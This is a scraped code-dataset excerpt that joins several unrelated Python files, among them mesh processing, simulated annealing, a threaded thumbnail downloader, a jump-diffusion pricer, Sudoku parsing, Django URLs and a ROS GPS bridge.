_self.Y[line] = float(coords[2])\n lineNr += 1\n\n # assign boundary names to vertPhysicalName \n _self.vertPhysicalName = [[] for i in range(_self.numVerts)]\n\n # 3rd. priority loop\n for elem in range(0,_self.numElems):\n v1 = _self.IEN[elem][0]\n v2 = _self.IEN[elem][1]\n boundary = _self.elemPhysicalName[elem]\n _self.vertPhysicalName[v1] = boundary\n _self.vertPhysicalName[v2] = boundary\n\n if \"NormalU\" in boundary or \"NormalV\" in boundary:\n _self.vertPhysicalName[v1] = boundary\n _self.vertPhysicalName[v2] = boundary\n\n # 2nd. priority loop\n for elem in range(0,_self.numElems):\n v1 = _self.IEN[elem][0]\n v2 = _self.IEN[elem][1]\n boundary = _self.elemPhysicalName[elem]\n\n if \"InflowU\" in boundary or \"InflowV\" in boundary or \\\n \"InflowUParabolic\" in boundary or \"InflowVParabolic\" in boundary:\n _self.vertPhysicalName[v1] = boundary\n _self.vertPhysicalName[v2] = boundary\n\n # 1st. priority loop\n for elem in range(0,_self.numElems):\n v1 = _self.IEN[elem][0]\n v2 = _self.IEN[elem][1]\n boundary = _self.elemPhysicalName[elem]\n\n if \"NoSlip\" in boundary or \"NoSlipConcentration\" in boundary or \\\n \"NoSlipPressure\" in boundary or \"InvU\" in boundary or \\\n \"InvV\" in boundary or \"Inflow2Bubbles\" in boundary:\n _self.vertPhysicalName[v1] = boundary\n _self.vertPhysicalName[v2] = boundary\n\n def setInterfaceBC(_self):\n _self.vertIdRegion = np.zeros((_self.numVerts,1),dtype=int)\n _self.Marker = np.zeros((_self.numVerts,1),dtype=float)\n\n for i in range(0,_self.numElems):\n v1 = _self.IEN[i][0]\n v2 = _self.IEN[i][1]\n _self.vertIdRegion[v1] = _self.elemIdRegion[i]\n _self.vertIdRegion[v2] = _self.elemIdRegion[i]\n\n if _self.elemIdRegion[i] > 0:\n _self.Marker[v1] = 0.5\n _self.Marker[v2] = 0.5\n\n def getNormalAndKappa(_self,_node,_myList):\n P0x = _self.X[_node]\n P0y = _self.Y[_node]\n\n fx = 0\n fy = 0\n sumLength = 0;\n sumXCrossUnit = 0;\n sumYCrossUnit = 0;\n\n listSize = len(_myList)\n for i in range(0,listSize-1):\n v1 = _myList[0]\n v2 = _myList[1]\n\n # v2 surfaceNode v1\n # x ------- x ------- x (surface region)\n # (2Unit) <---- ----> (1Unit)\n #\n P1x = _self.X[v1];\n P1y = _self.Y[v1];\n P2x = _self.X[v2];\n P2y = _self.Y[v2];\n\n # distance of 0 - 1\n a = geometry.distance(P0x,P0y,P1x,P1y);\n\n # distance of 0 - 2\n b = geometry.distance(P0x,P0y,P2x,P2y);\n \n # vetors\n x1Unit = (P1x-P0x)/a;\n y1Unit = (P1y-P0y)/a;\n\n x2Unit = (P2x-P0x)/b\n y2Unit = (P2y-P0y)/b\n\n fx = x1Unit+x2Unit\n fy = y1Unit+y2Unit\n\n # 2D rotation of z = 90 degrees\n # x' = x*cos(z) - y*sin(z)\n # y' = x*sin(z) + y*cos(z)\n sumXCrossUnit = -y1Unit*1 + y2Unit*1\n sumYCrossUnit = +x1Unit*1 - x2Unit*1\n\n # 1/2 of length P0-P1 and P0-P2\n sumLength = (a+b)/2.0\n\n length = geometry.vectorLength(sumXCrossUnit,sumYCrossUnit);\n\n xNormalUnit = sumXCrossUnit/length\n yNormalUnit = sumYCrossUnit/length\n\n # intensidade da forca resultante\n force = np.sqrt( (fx*fx)+(fy*fy) )\n\n # direction of force at node -> outward\n if( (fx*xNormalUnit+fy*yNormalUnit) > 0.0 ):\n force = -force;\n\n pressure = force/sumLength\n\n vec = np.zeros((3,1),dtype=float)\n vec[0] = pressure\n vec[1] = xNormalUnit\n vec[2] = yNormalUnit\n return vec\n\n def setSurface(_self):\n _self.surface = _self.Marker == 0.5\n _self.surface = _self.surface.nonzero()[0]\n\n def setNormalAndKappa(_self):\n _self.setSurface()\n _self.setNeighbor()\n _self.xNormal = np.zeros((_self.numVerts,1),dtype=float)\n _self.yNormal = np.zeros((_self.numVerts,1),dtype=float)\n _self.curvature = np.zeros((_self.numVerts,1),dtype=float)\n for i in range(0,len(_self.surface)):\n node = _self.surface[i]\n\n myList = _self.getNeighborPoint(node)\n vec = _self.getNormalAndKappa(node,myList)\n\n _self.xNormal[node] = vec[0]\n _self.yNormal[node] = vec[1]\n _self.curvature[node] = vec[2]\n\n def setNeighbor(_self):\n _self.neighborElem = [[] for i in range(_self.numVerts)]\n for i in range(0,_self.numElems):\n for j in range(0,2):\n v = _self.IEN[i][j]\n _self.neighborElem[v].append(i)\n \n def getNeighborPoint(_self,_node):\n elem1 = _self.neighborElem[_node][0]\n elem2 = _self.neighborElem[_node][1]\n node1 = _self.IEN[elem1][0];node2 = _self.IEN[elem1][1]\n node3 = _self.IEN[elem2][0];node4 = _self.IEN[elem2][1]\n if node1 == node3 or node1 == node4:\n verts = [node2,node3]\n else:\n verts = [node4,node1]\n return verts\n\n def stats(_self):\n \"\"\"\n fora e dentro das bolhas\n _self.elemIdRegion == 0 --> wall\n _self.elemIdRegion == 1 --> bubble 1\n _self.elemIdRegion == 2 --> bubble 2 , etc\n \"\"\"\n _self.minLength = [1E10]*(_self.elemIdRegion.max()+1)\n _self.idMinLength = [0]*(_self.elemIdRegion.max()+1)\n _self.maxLength = [-1E10]*(_self.elemIdRegion.max()+1)\n _self.idMaxLength = [0]*(_self.elemIdRegion.max()+1)\n _self.sumLength = [0]*(_self.elemIdRegion.max()+1)\n _self.averageLineLength = [0]*(_self.elemIdRegion.max()+1)\n\n count = [0]*(_self.elemIdRegion.max()+1)\n for e in range(0,_self.numElems):\n v1 = _self.IEN[e][0]\n p1x = _self.X[v1] \n p1y = _self.Y[v1] \n\n v2 = _self.IEN[e][1]\n p2x = _self.X[v2] \n p2y = _self.Y[v2] \n\n elemID = _self.elemIdRegion[e];\n length = geometry.distance(p1x,p1y,p2x,p2y)\n\n _self.sumLength[elemID] += length;\n\n if length < _self.minLength[elemID]:\n _self.minLength[elemID] = length\n _self.idMinLength[elemID] = e\n if length > _self.maxLength[elemID]: \n _self.maxLength[elemID] = length\n _self.idMaxLength[elemID] = e\n\n count[elemID] += 1\n for nb in range(0,_self.elemIdRegion.max()+1):\n _self.averageLineLength[nb] = _self.sumLength[nb]/count[nb]\n\n\n\n","sub_path":"Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":25726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"150127527","text":"import pandas as pd\nimport numpy as np\nimport random\nimport math\n\ndef gen_features(data, status):\n k = 0\n features = np.empty((int(sum(status)),62))\n for i in range(len(data)):\n if status[i]==1:\n features[k] = data[i]\n k = k+1\n return features\n\ndef classify(data, label):\n A = 0\n for i in range(len(label)):\n if label[i] == 1:\n A = A+1\n a=0\n b=0\n classA = np.empty((A,2000))\n classB= np.empty((len(label)-A,2000))\n for s in range(len(label)):\n if label[s] ==1:\n classA[a] = data.T[s]\n a = a+1\n else:\n classB[b] = data.T[s]\n b = b+1\n return classA, classB\n\ndef obj(data, label):\n A = 0\n B = 0\n for i in range(len(data)):\n A = A + abs(np.corrcoef(data[i],label)[1,0])\n mean_A = A/len(data) \n\n for k in range(len(data)):\n for j in range(k, len(data)):\n if k != j:\n B = B + abs(np.corrcoef(data[k],data[j])[1,0])\n mean_B = 2*B/(len(data)*len(data)-len(data))\n return mean_B-mean_A #the smaller the better\n\ndef SA(data, label, cooling_rate, T0, max_iteration, disturbance_num): \n current_status = np.random.uniform(0,2000,2000)\n for i in range(2000):\n if current_status[i]<10:\n current_status[i] = 1\n else:\n current_status[i] = 0\n features = gen_features(data, current_status) \n fitness_curr = obj(features, label) \n temp_status = current_status\n best_status = current_status \n fitness_best = fitness_curr\n T = T0\n \n for i in range(max_iteration):\n disturbance = np.random.randint(0,2000,size=disturbance_num)\n for s in disturbance:\n temp_status[s] = 1-temp_status[s]\n \n features = gen_features(data, temp_status)\n fitness_temp = obj(features, label) \n delta = fitness_temp - fitness_curr\n \n if delta<0:\n fitness_curr = fitness_temp\n current_status = temp_status\n else:\n prob = random.random()\n if prob0:\n tumor[i] = 1\n else:\n tumor_num = tumor_num+1\n tumor[i] = -1\n \na = SA(genes, tumor, 0.5, 10000, 10, 1)\nprint(a)\n","sub_path":"HW3-2.py","file_name":"HW3-2.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"116497017","text":"import re\n\n\nclass Solution:\n def myAtoi(self, str: str) -> int:\n re_str = r\"\\s*[-|+]?\\d+\"\n res = re.match(re_str, str)\n try:\n res = int(res[0].strip(\" \"))\n except:\n return 0\n else:\n return max(min(res, 2**31 - 1), (-2)**31)\n","sub_path":"string-to-integer-atoi/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"489345300","text":"# thumbnail_maker.py\nimport time\nimport os\nimport logging\nfrom urllib.parse import urlparse\nfrom urllib.request import urlretrieve\nfrom queue import Queue\nfrom threading import Thread\n\nimport PIL\nfrom PIL import Image\n\nFORMAT = \"[%(threadName)s, %(asctime)s, %(levelname)s] %(message)s\"\nlogging.basicConfig(filename='logfile.log', level=logging.DEBUG, format=FORMAT)\n\nclass ThumbnailMakerService(object):\n def __init__(self, home_dir='.'):\n self.home_dir = home_dir\n self.input_dir = self.home_dir + os.path.sep + 'incoming'\n self.output_dir = self.home_dir + os.path.sep + 'outgoing'\n self.img_queue = Queue()\n self.dl_queue = Queue()\n\n def download_image(self):\n # We are doing double check for the emptiness of the dl_queue\n # this is done, because there is a situation when a threads comes in there is\n # a last item in the queue, and it asks if the queue is empty, and gets a false result\n # then it gets suspended and another thread is getting that last item from the queue\n # then the first thread is resumed and, trying to get that item, but the queue is empty,\n # therefore an exception of queue.Empty is being thrown, and if we don't catch it we\n # will exit.\n # in the except block we don't need to do anything because the thread will ask the while loop\n # is the queue is empty and now it will get a true result, and will finish it's work\n while not self.dl_queue.empty():\n try:\n url = self.dl_queue.get(block=False)\n # download each image and save to the input dir\n img_filename = urlparse(url).path.split('/')[-1]\n urlretrieve(url, self.input_dir + os.path.sep + img_filename)\n self.img_queue.put(img_filename)\n\n self.dl_queue.task_done()\n except Queue.Empty:\n logging.info('Queue empty')\n\n def download_images(self, img_url_list):\n # validate inputs\n if not img_url_list:\n return\n os.makedirs(self.input_dir, exist_ok=True)\n\n logging.info(\"beginning image downloads\")\n\n start = time.perf_counter()\n for url in img_url_list:\n # download each image and save to the input dir\n img_filename = urlparse(url).path.split('/')[-1]\n urlretrieve(url, self.input_dir + os.path.sep + img_filename)\n self.img_queue.put(img_filename)\n end = time.perf_counter()\n\n self.img_queue.put(None)\n logging.info(\"downloaded {} images in {} seconds\".format(len(img_url_list), end - start))\n\n def perform_resizing(self):\n # validate inputs\n os.makedirs(self.output_dir, exist_ok=True)\n\n logging.info(\"beginning image resizing\")\n target_sizes = [32, 64, 200]\n num_images = len(os.listdir(self.input_dir))\n\n start = time.perf_counter()\n while True:\n filename = self.img_queue.get()\n if filename:\n logging.info(\"resizing image {}\".format(filename))\n orig_img = Image.open(self.input_dir + os.path.sep + filename)\n for basewidth in target_sizes:\n img = orig_img\n # calculate target height of the resized image to maintain the aspect ratio\n wpercent = (basewidth / float(img.size[0]))\n hsize = int((float(img.size[1]) * float(wpercent)))\n # perform resizing\n img = img.resize((basewidth, hsize), PIL.Image.LANCZOS)\n\n # save the resized image to the output dir with a modified file name\n new_filename = os.path.splitext(filename)[0] + \\\n '_' + str(basewidth) + os.path.splitext(filename)[1]\n img.save(self.output_dir + os.path.sep + new_filename)\n\n os.remove(self.input_dir + os.path.sep + filename)\n logging.info(\"done resizing image {}\".format(filename))\n self.img_queue.task_done()\n # This else is when the posion pill consumed and the message is None\n else:\n self.img_queue.task_done()\n break\n end = time.perf_counter()\n\n logging.info(\"created {} thumbnails in {} seconds\".format(num_images, end - start))\n\n def make_thumbnails(self, img_url_list):\n logging.info(\"START make_thumbnails\")\n\n start = time.perf_counter()\n # Here we are downloading all the images and storing them into a mq \n # dl_queue, we did this in order to avoid, many threads downloading\n # from the resource concurrently, and my cause a ddos to the web service.\n for img_url in img_url_list:\n self.dl_queue.put(img_url)\n # Here we are triggering 4 threads that will get a url from the dl_queue\n # and then will download the image, after each thread is finish with the download\n # it will mark the task as task_done, we need this because dl_queue is triggered a\n # dl_queue.join() method in order the know when threads finished downloading all images\n # before we used a second queue for storing the url's, we had only 1 queue,\n # that the threads stored the images inside, and the thread that is responsible for \n # the resizing consumed the images from that queue\n num_dl_threads = 4\n for _ in range(num_dl_threads):\n t = Thread(target=self.download_image)\n t.start()\n # triggering a thread for handle all the downloaded images, the was putted inside the\n # img_queue\n t2 = Thread(target=self.perform_resizing)\n t2.start()\n\n # In order for us to know when to put the poison pill described below, we will wait for\n # all the tasks in the dl_queue to be done, and then we know that all images were downloaded\n # and now we can put the poison pill inside the img_queue, for the resize thread to consume \n # and exit the infinite loop\n self.dl_queue.join()\n # This is how the thread responsible for resizing will know how to finish his work\n # it is called a posion pill, the resizing thread will consume this None message and \n # will to know that all images were resized\n\n self.img_queue.put(None)\n # we don't want to join here for the 4 producer threads becuase the important threads\n # is the resize thread, and that's because we know that when the resize thread is done,\n # there are no more images to resize and therefore we can exit\n t2.join()\n\n end = time.perf_counter()\n logging.info(\"END make_thumbnails in {} seconds\".format(end - start))\n","sub_path":"mt-queues/thumbnail_make.py","file_name":"thumbnail_make.py","file_ext":"py","file_size_in_byte":6761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"589646873","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 12 12:57:08 2019\r\n\r\n@author: HP\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom sn_random_numbers import sn_random_numbers\r\nfrom simulation_class import simulation_class\r\nclass jump_diffusion(simulation_class):\r\n '''\r\n base on jump diffsuion to generate simulated paths\r\n '''\r\n def __init__(self,name,mar_env,corr=False):\r\n super(jump_diffusion,self).__init__(name,mar_env,corr)\r\n try:\r\n self.lamb=mar_env.get_constant('lambda')\r\n self.mu=mar_env.get_constant('mu')\r\n self.delt=mar_env.get_constant('delta')\r\n except:\r\n print (\"Error parsing market enviroment\")\r\n def update(self,inital_value=None,volatility=None,lamb=None,mu=None,delta=None,final_date=None):\r\n if initial_value is not None:\r\n self.initial_value=initial_value\r\n if volatility is not None:\r\n self.volatility=volatility\r\n if lamb is not None:\r\n self.lamb=lamb\r\n if mu is not None:\r\n self.mu=mu\r\n if delta is not None:\r\n self.delt=delta\r\n if final_date is not None:\r\n self.final_date=final_date\r\n self.instrument_values=None\r\n def generate_paths(self,fixed_seed=False,day_count=365.):\r\n if self.time_grid is None:\r\n self.generate_time_grid()\r\n M=len(se.time_grid)\r\n I=self.paths\r\n paths=np.zeros((M,I))\r\n paths[0]=self.initial_value\r\n if self.correlated is False:\r\n sn1=sn_random_numbers((1,M,I),fixed_seed=fixed_seed)\r\n else:\r\n sn1=self.random_numbers\r\n sn2=sn_random_numbers((1,M,I),fixed_seed=fixed_seed)\r\n rj=self.lamb*(np.exp(self.mu+0.5*self.delt**2)-1)\r\n short_rate=self.discount_curve.short_rate\r\n \r\n for t in range(1,len(self.time_grid)):\r\n if self.correated in False:\r\n ran=sn1(t)\r\n else:\r\n ran=np.dot(self.cholesky_matrix,sn1[:,t,:])\r\n ran=ran[self.rn_set]\r\n dt=(self.time_grid[t]-self.time_grid[t-1]).days/day_count\r\n poi=np.random.poisson(self.lamb*dt,I)\r\n paths[t]=paths[t-1]+(np.exp((short_rate-rj-0.5*self.volatility**2)*dt+self.volatility*np.sqrt(dt)*ran)+(np.exp(self.mu+self.delt*sn2[t])-1)*poi)\r\n self.instrument_value=paths\r\n \r\n ","sub_path":"dx/jump_diffusion.py","file_name":"jump_diffusion.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"397385390","text":"import random\n\nclass Sudoku():\n def __init__(self, a):\n self.meret = int(len(a)**(1/2))\n self.kezdo_allapot = a\n\n def print(self):\n for i in range(len(self.kezdo_allapot)):\n c = self.kezdo_allapot[i]\n if c == \"0\":\n print(\"_\", end=\" \")\n else:\n print(c, end=\" \")\n\n if i % self.meret == self.meret-1:\n print()\n\n\nfeladvanyok = []\nwith open(\"feladvanyok.txt\", \"r\") as file:\n for sor in file:\n s = Sudoku(sor.strip())\n feladvanyok.append(s)\n\nprint(f\"3. feladat Beolvasva {len(feladvanyok)} feldavány\")\n\nf4_meret=int(input(\"4. feladat Adj meg egy szamot 4-9 ig: \"))\nwhile f4_meret<4 or f4_meret>9:\n f4_meret=int(input(\"4. feladat Adj meg egy szamot 4-9 ig: \"))\n\nf4_feladv=list(filter(lambda f: f.meret==f4_meret, feladvanyok))\nprint(f\"a {f4_meret}x{f4_meret}-ű fela..{len(f4_feladv)}\")\n\n\nrandom_index=random.randint(0,len(f4_feladv)-1)\n\nprint(f\"5f a kiv fel:\")\nrandom_feladvany=f4_feladv[random_index]\nprint(random_feladvany.kezdo_allapot)\n# print(random.choice(f4_feladv).kezdo_allapot)\n\n\n\nr_string=random_feladvany.kezdo_allapot\n\nf6_mo=(len(r_string)-r_string.count(\"0\"))/len(r_string)*100\n\nprint(f\"6f feldv kitoltottsege: {f6_mo:.0f}\")\n\n\nprint(f\"7f\")\nrandom_feladvany.print()\n\nprint(\"8f\")\n\nwith open(f\"sudoku{f4_meret}.txt\", \"w\") as ofile:\n for f in f4_feladv:\n ofile.write(f.kezdo_allapot)\n ofile.write(\"\\n\")\n\n\n# for f in feladvanyok:\n# f.print()\n","sub_path":"python/11_26/sudokuCLI.py","file_name":"sudokuCLI.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"629219727","text":"\r\ndef str_perm(s):\r\n\r\n out = []\r\n\r\n if len(s) <= 1:\r\n return s\r\n else:\r\n for i, let in enumerate(s):\r\n for perm in str_perm(s[:i]+ s[i+1:]):\r\n out += [let + perm]\r\n return out\r\n\r\na = str_perm('abcd')\r\nprint(a)\r\n\r\n\r\n","sub_path":"python_programs/Recursion/string_permutation.py","file_name":"string_permutation.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"84281450","text":"from django.urls import path, re_path\n\nfrom . import views\n\napp_name = 'esm'\nurlpatterns = [\n path('', views.home, name='home'),\n path('login/', views.user_login, name='login'),\n path('logout/', views.user_logout, name='logout'),\n path('signup/', views.signup, name='signup'),\n path('create/', views.create, name='create'),\n path('search/', views.search, name='search'),\n path('search/', views.search_es, name='search_es'),\n path('get_question_search/', views.search_get_question, name='get_question_search'),\n path('get_question//', views.create_get_question, name='get_question'),\n path('create/edit//', views.create_edit_es, name='edit'),\n path('create/edit/save_question//', views.create_save_question, name='save_question'),\n path('create/edit/delete_choice/', views.create_del_choice, name='del_choice'),\n path('account/', views.account, name='account'),\n\n]","sub_path":"ESMarketplace/esm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"4167606","text":"# Урок 3. Задание 1 (task_1):\n# В диапазоне натуральных чисел от 2 до 99 определить,\n# сколько из них кратны каждому из чисел в диапазоне от 2 до 9.\n\nfor i in range(2, 10):\n temp_count = 0\n for n in range(2, 100):\n if not n % i:\n temp_count += 1\n print(f'Числу {i} кратны {temp_count} чисел.')\n","sub_path":"lesson_03/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"470912178","text":"#!/usr/bin/python\n\nimport time\nimport traceback\nimport socket\nimport json\nimport numpy\n\nimport rospy\n\nfrom std_msgs.msg import Header, Float64\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Pose, PoseWithCovariance, Twist, TwistWithCovariance, Point, Vector3, Quaternion, TransformStamped, Transform\nfrom tf.msg import tfMessage\n\n\nrospy.init_node('sdgps_solution_ros_bridge')\n\nhost = rospy.get_param('~host', '127.0.0.1')\nport = rospy.get_param('~port')\nchild_frame_id = rospy.get_param('~child_frame_id')\ndecimation = rospy.get_param('~decimation', 1)\n\nodom_pub = rospy.Publisher('odom', Odometry)\nabsodom_pub = rospy.Publisher('absodom', Odometry)\nclock_error_pub = rospy.Publisher('clock_error', Float64)\n\ntf_pub = rospy.Publisher('/tf', tfMessage)\n\ndef go():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n \n first = True\n \n buf = ''\n count = 0\n while True:\n d = s.recv(2**12)\n if not d:\n break\n buf += d\n \n lines = buf.split('\\n')\n buf = lines[-1]\n for line in lines[:-1]:\n if first:\n first = False\n continue\n \n if count % decimation == 0:\n d = json.loads(line)\n \n ecef_cov = numpy.array(d['X_position_relative_position_orientation_ecef_covariance'])\n absodom_pub.publish(Odometry(\n header=Header(\n stamp=rospy.Time.from_sec(d['timestamp']*1e-9),\n frame_id='/ecef',\n ),\n child_frame_id=child_frame_id,\n pose=PoseWithCovariance(\n pose=Pose(\n position=Point(*d['position_ecef']),\n orientation=Quaternion(**d['orientation_ecef']),\n ),\n covariance=numpy.vstack((\n numpy.hstack((ecef_cov[0:3, 0:3], ecef_cov[0:3, 6:9])),\n numpy.hstack((ecef_cov[6:9, 0:3], ecef_cov[6:9, 6:9])),\n )).flatten(),\n ),\n twist=TwistWithCovariance(\n twist=Twist(\n linear=Vector3(*d['velocity_body']),\n angular=Vector3(*d['angular_velocity_body']),\n ),\n covariance=numpy.vstack((\n numpy.hstack((d['X_velocity_body_covariance'], numpy.zeros((3, 3)))),\n numpy.hstack((numpy.zeros((3, 3)), d['X_angular_velocity_body_covariance'])),\n )).flatten(),\n ),\n ))\n odom_pub.publish(Odometry(\n header=Header(\n stamp=rospy.Time.from_sec(d['timestamp']*1e-9),\n frame_id='/enu',\n ),\n child_frame_id=child_frame_id,\n pose=PoseWithCovariance(\n pose=Pose(\n position=Point(*d['relative_position_enu']),\n orientation=Quaternion(**d['orientation_enu']),\n ),\n covariance=numpy.array(d['X_relative_position_orientation_enu_covariance']).flatten(),\n ),\n twist=TwistWithCovariance(\n twist=Twist(\n linear=Vector3(*d['velocity_body']),\n angular=Vector3(*d['angular_velocity_body']),\n ),\n covariance=numpy.vstack((\n numpy.hstack((d['X_velocity_body_covariance'], numpy.zeros((3, 3)))),\n numpy.hstack((numpy.zeros((3, 3)), d['X_angular_velocity_body_covariance'])),\n )).flatten(),\n ),\n ))\n clock_error_pub.publish(Float64(d['X_clock_error']))\n tf_pub.publish(tfMessage(\n transforms=[\n TransformStamped(\n header=Header(\n stamp=rospy.Time.from_sec(d['timestamp']*1e-9),\n frame_id='/enu',\n ),\n child_frame_id=child_frame_id,\n transform=Transform(\n translation=Point(*d['relative_position_enu']),\n rotation=Quaternion(**d['orientation_enu']),\n ),\n ),\n ],\n ))\n \n count += 1\n\nwhile True:\n try:\n go()\n except Exception:\n traceback.print_exc()\n time.sleep(1)\n","sub_path":"gnc/navigator_state_estimation/nodes/solution_ros_bridge.py","file_name":"solution_ros_bridge.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"159848337","text":"from itertools import product\n\nfrom preprocessing.prod.dict_parsers.GraphDictParser import GraphDictParser\nfrom preprocessing.prod.dict_parsers.BaseDictParser import BaseDictParser\n\ndict_parsers = {\n 'base': BaseDictParser,\n 'graph': GraphDictParser\n}\n\n\nclass BaseFilter:\n\n def __init__(self):\n self._beginning_separators = [\n self.construct_named_regex(name='begin',\n pattern=pattern,\n after_group_quantifier=quantifier,\n string_beginning=string_beginning)\n for pattern, string_beginning, quantifier in zip([r\"[\\s\\(]\", r\"[\\?!,\\.\\(\\)\\s]\"], [True, False], ['*', '+'])\n ]\n self._ending_separators = [\n self.construct_named_regex(name='end',\n pattern=r\"[\\?!,\\.\\(\\)\\s]\",\n after_group_quantifier=quantifier,\n string_ending=string_ending)\n for quantifier, string_ending in zip([\"*\", \"+\"], [True, False])\n ]\n self._pattern_dict = {}\n\n @staticmethod\n def construct_named_regex(name: str, pattern: str, after_group_quantifier: str='?',\n string_beginning=False, string_ending=False):\n string_b = '^' if string_beginning else ''\n string_e = '$' if string_ending else ''\n return r\"{}(?P<{}>{}){}{}\".format(string_b, name, pattern, after_group_quantifier, string_e)\n\n @staticmethod\n def _load_patterns_with_file(pattern_file, kind='base'):\n return dict_parsers[kind](pattern_file).get_dict()\n\n @staticmethod\n def _make_single_pattern_w_patterns(patterns):\n return '({})'.format('|'.join(['({})'.format(p) for p in patterns]))\n\n def _populate_pattern(self, pattern):\n \"\"\"embraces pattern with:\n 1. beginning of string & end of string\n 2. space & end of string\n 3. beginning of string & space\n 4. space & end of sentence\n \"\"\"\n return [begin + pattern + end for begin, end in product(self._beginning_separators, self._ending_separators)]","sub_path":"filters/BaseFilter.py","file_name":"BaseFilter.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"281622386","text":"from unittest import TestCase\n\nimport numpy as np\nimport tensorflow as tf\nfrom shape_completion_training.utils import tf_utils\nfrom shape_completion_training.voxelgrid.utils import inflate_voxelgrid\n\n\nclass TestUtils(TestCase):\n def test_geometric_mean(self):\n t = tf.convert_to_tensor([[1, 3, 9], [1, 1, 27.]])\n self.assertEqual(3, tf_utils.reduce_geometric_mean(t))\n\n def test_inflate_voxelgrid_by_one(self):\n vg_np = np.zeros((1, 13, 13, 13, 1), dtype=np.float32)\n vg_np[0, 7, 8, 11, 0] = 1.0\n vg = tf.constant(vg_np)\n inflated_vg = inflate_voxelgrid(vg)\n\n self.assertEqual(np.sum(inflated_vg), 27)\n\n for i in [6, 7, 8]:\n for j in [7, 8, 9]:\n for k in [10, 11, 12]:\n self.assertEqual(inflated_vg[0, i, j, k, 0], 1.0)\n","sub_path":"shape_completion_training/src/shape_completion_training/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"162830262","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 1 02:19:56 2019\n\n@author: ktjgu\n\"\"\"\n\nimport numpy as np\nfrom datetime import datetime\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom iexfinance.stocks import Stock\nfrom iexfinance.stocks import get_historical_data\n\nimport json\n\nwith open('config.json') as json_data_file:\n data = json.load(json_data_file)\n\ndef nlp():\n df2 = pd.read_csv(\"Combined_News_DJIA.csv\")\n print (df2)\n print (df2.sort_values(by=\"Date\", ascending=False))\n\niextoken = data[\"token\"]\n\nstart = datetime(2018, 10, 31)\nend = datetime.now()\n\ndf = get_historical_data(\"TXN\", start=start, end=end, output_format='pandas', token = iextoken)\nprint(df)\n\ndates = np.arange(df.shape[0])\nclose_vals = df['close'].values\nplt.plot(dates, close_vals)\n\nMat = np.zeros((len(dates), 2))\nMat[:, 0] = np.ones(len(dates))\nMat[:, 1] = dates\n\nmodel = LinearRegression().fit(Mat, close_vals)\ncoeffs = model.coef_\nintercept = model.intercept_\n\na = np.linspace(0, len(dates))\nb = model.intercept_ + coeffs[1]*a\nplt.plot(dates, close_vals, color ='b')\nplt.plot(a, b, color='r')","sub_path":"stock_predict_nlp_reg.py","file_name":"stock_predict_nlp_reg.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"504594018","text":"#!/usr/bin/python3\n\"\"\" starts a Flask web application \"\"\"\nfrom os import path, getenv\nfrom flask import Flask\nfrom flask import render_template\nfrom models import storage\nfrom models.state import State\n\napp = Flask(__name__)\napp.jinja_env.trim_blocks = True\napp.jinja_env.lstrip_blocks = True\n\n\n@app.route('/cities_by_states')\ndef cities_by_states():\n \"\"\" display all the states and the cities linked to \"\"\"\n return render_template(\n '8-cities_by_states.html',\n states=storage.all(State).values(),\n type_storage=getenv('HBNB_TYPE_STORAGE')\n )\n\n\n@app.teardown_appcontext\ndef teardown_appcontext(error):\n \"\"\" remove the current SQLAlchemy Session After each request \"\"\"\n storage.close()\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000, debug=True)\n","sub_path":"web_flask/8-cities_by_states.py","file_name":"8-cities_by_states.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"310586540","text":"\"\"\"======================================================================================\n gmm_pipe.py\n \n Input: raw sensor data \n Output: labelled sensor data and plots\n \nLast update, Fall 2020\n======================================================================================\"\"\"\nimport imageio\nimport matplotlib.animation as ani\nimport matplotlib.cm as cmx\nimport matplotlib.colors as colors\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as scipy\nimport enum\nimport sys\nimport bisect\nimport random\nimport collections\nimport os\n\nfrom matplotlib.patches import Ellipse\nfrom PIL import Image\nfrom sklearn import datasets\nfrom sklearn.cluster import KMeans\n\nfrom matplotlib.pyplot import figure, show\nfrom matplotlib.ticker import MaxNLocator\n\nfrom read_data import read_data1\nfrom plot_data import 